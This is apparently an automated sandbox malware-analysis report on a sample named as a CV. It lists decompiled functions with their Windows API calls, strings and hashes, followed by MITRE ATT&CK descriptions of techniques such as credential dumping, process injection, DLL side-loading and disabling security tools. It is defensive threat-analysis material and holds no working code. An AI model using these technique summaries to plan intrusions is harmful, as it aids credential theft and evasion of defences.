Instruction ID: d03a863164d4173fa5c1220957c52fcf7b60e5dc316347e98fdadcd48975eab8
Opcode Fuzzy Hash: 0e96c7a7c4d56bc62901743c7dc5103f6c262309cb1f1eb4153e092411c2a484
Instruction Fuzzy Hash: 80115871500208EAEB225EA8DC80FEB3B6EEB09379F514715FD65971E0C7359C589BA0

Function 00335262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003352D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003352F4

Strings

0, xrefs: 003352CE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 528c7dfe1d7b2f769220de9e4d53967da2629fbbd19447096899b89cfeab5657
Instruction ID: 615d12a08cc7aaccc190c3e203a42a9a570b46b2dabfc37d93d82602c95b91ed
Opcode Fuzzy Hash: 528c7dfe1d7b2f769220de9e4d53967da2629fbbd19447096899b89cfeab5657
Instruction Fuzzy Hash: 7F11047A901614ABDB23DF98DD84F9E77BCAB05764F160125E982E7290D3B0ED04CBD0

Function 00344D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00344DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00344E1E

Strings

<local>, xrefs: 00344DE6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c583b14b19da61c9cada3ac9cfcc440306fcc51ecda76a3746866607f97abed2
Instruction ID: e87369d026cab5492f46aeb0dd8b7afe76e4d50bbb603817884b8ce5d81c28a7
Opcode Fuzzy Hash: c583b14b19da61c9cada3ac9cfcc440306fcc51ecda76a3746866607f97abed2
Instruction Fuzzy Hash: 7F115A70901261FADB2A8F618899FEBFAECFF16755F10822AF5159A540D2706980C6E0

Function 0031A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003237A7
___raise_securityfailure.LIBCMT ref: 0032388E

Strings

(;, xrefs: 00323889

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (;
API String ID: 3761405300-3451541795
Opcode ID: d08f4f6518ad77e5832df449b02b1bf68c9fa48d21198329313ea94644d88869
Instruction ID: c84d04b03ce295e0cc3bd9d2679ffe7ac6897f9fcb2c16e16a5dc535e6678329
Opcode Fuzzy Hash: d08f4f6518ad77e5832df449b02b1bf68c9fa48d21198329313ea94644d88869
Instruction Fuzzy Hash: F82139B5500B04CAD74BDF25F9966427BF8BB48318F105A2AE6048B3A0E3F4EA80CF45

Function 0034A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0034A84E
htons.WSOCK32(00000000,?,00000000), ref: 0034A88B

Strings

255.255.255.255, xrefs: 0034A866

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: f91c646f1fc408c9ae86c5342d3876f085df4bdfeadd78494a342d57e309c372
Instruction ID: 547e1906a3f6064ee399e1981c8de771c0b80ccdc953d4437ae983a11fa37e3d
Opcode Fuzzy Hash: f91c646f1fc408c9ae86c5342d3876f085df4bdfeadd78494a342d57e309c372
Instruction Fuzzy Hash: 8001F579240304ABCB229F68C886FADB7A8EF45714F108526F516AF3D1D771F801CB52

Function 0032B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0032B7EF

Strings

ComboBox, xrefs: 0032B78B
ListBox, xrefs: 0032B7B9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 4af4f11c7f03cadbea6dbfa3ae3e1ae5e7927271c059712322d91ee5c37b1f7f
Instruction ID: 88156dd7f8326fecc29d2d40c640c2ae9273a282dc9bf092ef63f2ca54ed3644
Opcode Fuzzy Hash: 4af4f11c7f03cadbea6dbfa3ae3e1ae5e7927271c059712322d91ee5c37b1f7f
Instruction Fuzzy Hash: CD014C7161012CABCB06EBA8DC42DFEB37DBF06354B14061CF561672C2DF7058188B90

Function 0032B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0032B6EB

Strings

ComboBox, xrefs: 0032B687
ListBox, xrefs: 0032B6B5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: d3fbb0ee1268cb1d534818b4e02d7159733ab141c948c89c0f97d411785f9ec8
Instruction ID: a23edf3aadc2e5c25b4029d4c70b695785ef482b4aa0f83871e2627a28dcdacf
Opcode Fuzzy Hash: d3fbb0ee1268cb1d534818b4e02d7159733ab141c948c89c0f97d411785f9ec8
Instruction Fuzzy Hash: 0101677564111C6BDB06EBA4DA52EFFB3AC9F06344F200029B502B7291DF545E189BB5

Function 0032B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0032B76C

Strings

ComboBox, xrefs: 0032B70A
ListBox, xrefs: 0032B738

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 647c51fb9994c4b7121bb862d5483bcb26d86750a89dc2453da37648ce9e1364
Instruction ID: e5190489f3e44a66bff857c1ad71e0fa6b595cda6f0d17f72c73c12c3125a365
Opcode Fuzzy Hash: 647c51fb9994c4b7121bb862d5483bcb26d86750a89dc2453da37648ce9e1364
Instruction Fuzzy Hash: 4F01D67564011CABDB06E7A8DA02EFFB3AC9F06344F600029B501B3292DB645E199BB5

Function 00314D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00314D9E
__calloc_crt.LIBCMT ref: 00314DB7

Strings

";, xrefs: 00314DCE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __calloc_crt
String ID: ";
API String ID: 3494438863-4069014424
Opcode ID: 764d4f85f7b0eaec9212ea68e515fd968af7ab0c072221bf6cd8606a258aab87
Instruction ID: a3a35dbe41af0805763e849c23dc62a5af01490c23b2e3c31b4daa2809f3544a
Opcode Fuzzy Hash: 764d4f85f7b0eaec9212ea68e515fd968af7ab0c072221bf6cd8606a258aab87
Instruction Fuzzy Hash: 7EF062712096119AEB6FDB59FC416E767DCE709768F114B1AF304CE296E730C8C18B94

Function 002F4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(002F0000,00000063,00000001,00000010,00000010,00000000), ref: 002F4048
EnumResourceNamesW.KERNEL32(00000000,0000000E,003367E9,00000063,00000000,75C10280,?,?,002F3EE1,?,?,000000FF), ref: 003641B3

Strings

>/, xrefs: 002F4028

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >/
API String ID: 1578290342-237351608
Opcode ID: fa3197b74e95b68c6cc98e88fcbf30d01ddd3ae39a27beded76090815d2fa475
Instruction ID: c25fc5f609f1f4104c8fbb04668c4403e6195e927585a53354759e11728be317
Opcode Fuzzy Hash: fa3197b74e95b68c6cc98e88fcbf30d01ddd3ae39a27beded76090815d2fa475
Instruction Fuzzy Hash: F6F09031650314BBE2316B1ABC5AFD33BADE705BB9F50061AF314AA1E0D3F090C08A90

Function 00337744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00337762
_wcscmp.LIBCMT ref: 00337774

Strings

#32770, xrefs: 0033776E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 4e5916beb58f96d6dec89f248dc96a903195bdfbd389a0f2b552cdaec6784708
Instruction ID: 4eb6539f69aff8249aa1c1a0a27f30cf3f16a7abe32f4485c4c7bc162a03f703
Opcode Fuzzy Hash: 4e5916beb58f96d6dec89f248dc96a903195bdfbd389a0f2b552cdaec6784708
Instruction Fuzzy Hash: F6E0D87760433427D721EAA5DC4AFD7FBACEB55764F01011AFA09D3041D670E64187D4

Function 0032A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0032A63F

Part of subcall function 003113F1: _doexit.LIBCMT ref: 003113FB

Strings

Error allocating memory., xrefs: 0032A638
AutoIt, xrefs: 0032A633

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 06d04bfeaf1b94b659f8967f4ceeaf387e6f91afa8bdf6fca5afad6d0f4e0c82
Instruction ID: ff0411bfa63b2e729da8c992de6db4d5367e1848f59922cb43043d9c15bfaa6d
Opcode Fuzzy Hash: 06d04bfeaf1b94b659f8967f4ceeaf387e6f91afa8bdf6fca5afad6d0f4e0c82
Instruction Fuzzy Hash: 77D05B313C572837D227369C7C17FD5764C9F16F91F040465FB0C995C24AD6969042DA

Function 0036AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0036ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0036AEBD

Strings

WIN_XPe, xrefs: 0036ACD3

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 0bc438f47eab51c19d99dd332527955ad19d7a402af7ba7be24aaaf2e61a4e56
Instruction ID: d441c08d066f1316c49201ed4834bb9ec22c46b40e4564099774c621ed215a06
Opcode Fuzzy Hash: 0bc438f47eab51c19d99dd332527955ad19d7a402af7ba7be24aaaf2e61a4e56
Instruction Fuzzy Hash: 18E0C9B0C04A499FCB13DBA9D9449ECB7BCAB49701F14C185E116B6964DB705A84DF22

Function 00358698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003586A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003586B5

Part of subcall function 00337A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00337AD0

Strings

Shell_TrayWnd, xrefs: 0035869B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: cb471c342b7626872bc984d37f10304a015323172b9a49493c32c73eb1cb6e84
Instruction ID: 62f8fa37989983ae74eb8c6b8ab8114199859e4b6488b4b822c724adf40f67c7
Opcode Fuzzy Hash: cb471c342b7626872bc984d37f10304a015323172b9a49493c32c73eb1cb6e84
Instruction Fuzzy Hash: 50D01271785318B7E27667709C4BFC67A6C9F06B31F100819F74DAA1D0C9E0E980C754

Function 003586CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003586E2
PostMessageW.USER32(00000000), ref: 003586E9

Part of subcall function 00337A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00337AD0

Strings

Shell_TrayWnd, xrefs: 003586DB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9ab80f1a867a83343e14689e33f4832f2545562e66f3e73b7de9392633609c52
Instruction ID: 7be86a3c5b18857ea65bf1a60b1b5d7757894d875863c4f315dc24f167b87f09
Opcode Fuzzy Hash: 9ab80f1a867a83343e14689e33f4832f2545562e66f3e73b7de9392633609c52
Instruction Fuzzy Hash: 9AD0C9717853186BE27667709C4BFC66A689B06B21F500819B649AA1D0C9A0A9808658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
